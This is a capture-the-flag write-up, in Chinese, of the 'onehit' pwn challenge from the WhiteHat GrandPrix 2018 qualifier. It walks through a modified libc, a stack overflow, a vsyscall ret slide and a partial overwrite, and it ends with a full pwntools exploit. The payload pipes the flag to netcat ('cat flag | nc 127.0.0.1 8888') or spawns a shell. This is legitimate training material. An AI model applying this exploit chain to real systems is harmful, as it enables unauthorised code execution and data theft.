WhiteHat GrandPrix 2018 QUAL - p
2018-08-26 本文已影响0人
2mpossible
前几天M4X师傅给了道题看,当时没做出来,后来看了网上的wp之后觉得姿势很骚,
wp:http://pwn3r.tistory.com/entry/WhiteHat-GrandPrix-2018-QUAL-pwn03-onehit
然后libc是2.27的,在ubuntu16.04下无法运行
ubuntu16.04
所以后来在ubuntu18.04下做题了
ubuntu18.04
这题骚的就是他这个libc被修改过,隐藏了一个重要的trick
image.png
然后用010editor看看哪里不同
difference
gef➤ x/3i 0x4f43a
0x4f43a: add rdi,0x7f
0x4f43e: jmp 0x4f45b <system+27>
0x4f440 <system>: test rdi,rdi
gef➤ x/10i 0x4f45b
0x4f45b <system+27>: call 0x4eeb0 # do_system
0x4f460 <system+32>: test eax,eax
0x4f462 <system+34>: sete al
0x4f465 <system+37>: add rsp,0x8
0x4f469 <system+41>: movzx eax,al
0x4f46c <system+44>: ret
0x4f46d: nop DWORD PTR [rax]
0x4f470 <realpath>: push rbp
0x4f471 <realpath+1>: mov rbp,rsp
0x4f474 <realpath+4>: push r15
所以这里我们可以控制system的参数来调用do_system来cat flag
main
antiSPAM
一个常规的哈希爆破即可绕过
p.recvuntil("sha512(\"")
head = p.recvuntil("\"", drop = True)
p.recvuntil(") = 0x")
check = p.recvuntil("...", drop = True)
interger = 0
for i in range(0, 0x1fffff)[::-1]:
if sha512(head + str(i)).hexdigest().startswith(check):
print i
interger = i
break
p.recvuntil('interger = ')
p.send(str(interger).ljust(0x100,'\x11')) #为了后面v2非常大从而造成栈溢出
echo
这里由于v2未初始化,所以可以造成v2很大从而栈溢出,虽然程序开了canary,但是仔细看汇编
image.png
所以__stack_chk_fail函数形同虚设
这里还用到一个slide,在vsyscall里,可以不断ret到栈顶从而最终ret到想要的地址
gef➤ x/5i 0xffffffffff600400
0xffffffffff600400: mov rax,0xc9
0xffffffffff600407: syscall
0xffffffffff600409: ret
栈溢出前
gef➤ telescope $rsp 60
0x00007fff97da6a30│+0x00: 0x1111111111111111 ← $rsp
0x00007fff97da6a38│+0x08: 0x1111113111111111
0x00007fff97da6a40│+0x10: 0x1164616f6c796170 ← $rsi
0x00007fff97da6a48│+0x18: 0x00004f2d00000000
0x00007fff97da6a50│+0x20: 0x00007f27b1188360 → push rbx
0x00007fff97da6a58│+0x28: 0x00007fff97da6a4c → 0xb118836000004f2d ("-O"?)
0x00007fff97da6a60│+0x30: 0x1111111111111111
0x00007fff97da6a68│+0x38: 0x00007f27b11c41bd → <_IO_file_write+45> test rax, rax
0x00007fff97da6a70│+0x40: 0x1111111111111111
0x00007fff97da6a78│+0x48: 0x00007f27b1525760 → 0x00000000fbad2887
0x00007fff97da6a80│+0x50: 0x0000000000000d68 ("h"?)
0x00007fff97da6a88│+0x58: 0x0000000000000001
0x00007fff97da6a90│+0x60: 0x00007f27b15257e3 → 0x5268c0000000000a
0x00007fff97da6a98│+0x68: 0x00007f27b11c5f51 → <_IO_do_write+177> mov rbp, rax
0x00007fff97da6aa0│+0x70: 0x000055986bed2248 → "Only Echo is available"
0x00007fff97da6aa8│+0x78: 0x00007f27b1525760 → 0x00000000fbad2887
0x00007fff97da6ab0│+0x80: 0x000000000000000a
0x00007fff97da6ab8│+0x88: 0x000055986bed2248 → "Only Echo is available"
0x00007fff97da6ac0│+0x90: 0x00007f27b15212a0 → 0x0000000000000000
0x00007fff97da6ac8│+0x98: 0x0000000000000000
0x00007fff97da6ad0│+0xa0: 0x0000000000000000
0x00007fff97da6ad8│+0xa8: 0x00007f27b11c6403 → <_IO_file_overflow+259> cmp eax, 0xffffffff
0x00007fff97da6ae0│+0xb0: 0x0000000000000016
0x00007fff97da6ae8│+0xb8: 0x00007f27b1525760 → 0x00000000fbad2887
0x00007fff97da6af0│+0xc0: 0x000055986bed2248 → "Only Echo is available"
0x00007fff97da6af8│+0xc8: 0x00007f27b11b9b62 → <puts+418> cmp eax, 0xffffffff
0x00007fff97da6b00│+0xd0: "PLOUTZTJ"
0x00007fff97da6b08│+0xd8: 0x0000000000000000
0x00007fff97da6b10│+0xe0: 0x00007fff97da6c00 → 0x00007fff97da6c10 → 0x000055986bed2060 → push r15
0x00007fff97da6b18│+0xe8: 0x3595ebe7a90fd900
0x00007fff97da6b20│+0xf0: 0x00007fff97da6c00 → 0x00007fff97da6c10 → 0x000055986bed2060 → push r15 ← $rbp
0x00007fff97da6b28│+0xf8: 0x000055986bed1f69 → nop
0x00007fff97da6b30│+0x100: 0x0000000000000031 ("1"?)
0x00007fff97da6b38│+0x108: 0x0000000000000000
0x00007fff97da6b40│+0x110: 0x0000000000000000
0x00007fff97da6b48│+0x118: 0x0000000000000000
0x00007fff97da6b50│+0x120: 0x0000000000000000
0x00007fff97da6b58│+0x128: 0x0000000000000000
0x00007fff97da6b60│+0x130: 0x0000000000000000
0x00007fff97da6b68│+0x138: 0x0000000000000000
0x00007fff97da6b70│+0x140: 0x0000000000000000
0x00007fff97da6b78│+0x148: 0x0000000000000000
0x00007fff97da6b80│+0x150: 0x0000000000000000
0x00007fff97da6b88│+0x158: 0x0000000000000000
0x00007fff97da6b90│+0x160: 0x0000000000000000
0x00007fff97da6b98│+0x168: 0x00007f2700000000
0x00007fff97da6ba0│+0x170: 0x000055986bed2268 → "Echo machine: Would you like to ls -al?"
0x00007fff97da6ba8│+0x178: 0x3595ebe7a90fd900
0x00007fff97da6bb0│+0x180: 0x0000000000000000
0x00007fff97da6bb8│+0x188: 0x00007fff97da6c00 → 0x00007fff97da6c10 → 0x000055986bed2060 → push r15
0x00007fff97da6bc0│+0x190: 0x000055986bed1b50 → xor ebp, ebp
0x00007fff97da6bc8│+0x198: 0x00007f27b1188460 → <system+32> test eax, eax
0x00007fff97da6bd0│+0x1a0: 0x00007fff97da6cf0 → 0x0000000000000001
0x00007fff97da6bd8│+0x1a8: 0x000055986bed1fef → nop
栈溢出后
gef➤ telescope $rsp 60
0x00007ffd8cf98690│+0x00: 0x1111111111111111 ← $rsp
0x00007ffd8cf98698│+0x08: 0x1111113111111111
0x00007ffd8cf986a0│+0x10: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]" ← $rsi
0x00007ffd8cf986a8│+0x18: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986b0│+0x20: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986b8│+0x28: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986c0│+0x30: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986c8│+0x38: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986d0│+0x40: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986d8│+0x48: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986e0│+0x50: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986e8│+0x58: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986f0│+0x60: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf986f8│+0x68: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf98700│+0x70: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaacat[...]"
0x00007ffd8cf98708│+0x78: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaacat flag | [...]"
0x00007ffd8cf98710│+0x80: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaacat flag | nc 127.0[...]"
0x00007ffd8cf98718│+0x88: "aaaaaaaaaaaaaaaaaaaaaaacat flag | nc 127.0.0.1 888[...]"
0x00007ffd8cf98720│+0x90: "aaaaaaaaaaaaaaacat flag | nc 127.0.0.1 8888"
0x00007ffd8cf98728│+0x98: "aaaaaaacat flag | nc 127.0.0.1 8888"
0x00007ffd8cf98730│+0xa0: "at flag | nc 127.0.0.1 8888"
0x00007ffd8cf98738│+0xa8: "| nc 127.0.0.1 8888"
0x00007ffd8cf98740│+0xb0: ".0.0.1 8888"
0x00007ffd8cf98748│+0xb8: 0x6161616100383838 ("888"?)
0x00007ffd8cf98750│+0xc0: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]"
0x00007ffd8cf98758│+0xc8: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0x00007ffd8cf98760│+0xd0: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0x00007ffd8cf98768│+0xd8: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0x00007ffd8cf98770│+0xe0: "aaaaaaaaaaaaaaaaaaaaaaaa"
0x00007ffd8cf98778│+0xe8: "aaaaaaaaaaaaaaaa"
0x00007ffd8cf98780│+0xf0: "aaaaaaaa" ← $rbp
0x00007ffd8cf98788│+0xf8: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf98790│+0x100: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf98798│+0x108: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf987a0│+0x110: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf987a8│+0x118: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf987b0│+0x120: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf987b8│+0x128: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf987c0│+0x130: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf987c8│+0x138: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf987d0│+0x140: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf987d8│+0x148: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf987e0│+0x150: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf987e8│+0x158: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf987f0│+0x160: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf987f8│+0x168: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf98800│+0x170: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf98808│+0x178: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf98810│+0x180: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf98818│+0x188: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf98820│+0x190: 0xffffffffff600400 → 0x0f000000c9c0c748
0x00007ffd8cf98828│+0x198: 0x00007ffa0aa5e43a → add rdi, 0x7f
0x00007ffd8cf98830│+0x1a0: 0x00007ffd8cf98950 → 0x0000000000000001
0x00007ffd8cf98838│+0x1a8: 0x000055bf30acbfef → nop
ret的时候
成功调用system
image.png
由于关闭了输入输出管道,所以可以监听端口,用nc的方式来get flag
cat flag | nc 127.0.0.1 8888\x00
cat flag
也可以用wp里的
/bin/sh <&2 >&2 ;
来get shell
完整exp:
from pwn import *
from hashlib import sha512
context.log_level = 'debug'
p = process("./onehit.",env = {"LD_PRELOAD" : './libc-2.27.so'})
p.recvuntil("sha512(\"")
head = p.recvuntil("\"", drop = True)
p.recvuntil(") = 0x")
check = p.recvuntil("...", drop = True)
interger = 0
for i in range(0, 0x1fffff)[::-1]:
if sha512(head + str(i)).hexdigest().startswith(check):
print i
interger = i
break
p.recvuntil('interger = ')
p.send(str(interger).ljust(0x100,'\x11'))
#gdb.attach(p)
p.recvuntil('ls -al?\n')
p.send('N0\x00')
p.recvuntil('/bin/sh\n')
p.send('1')
gdb.attach(p)
p.recvuntil('available\n')
payload = 'a'*(0x7f+0x10)
payload += 'cat flag | nc 127.0.0.1 8888\x00' #cat flag
#payload += '/bin/sh <&2 >&2 ;' #get shell
payload = payload.ljust(0xe8,'a')
payload += p64(0xffffffffff600400)*20
payload += '\x3a'
p.send(payload)
p.interactive()
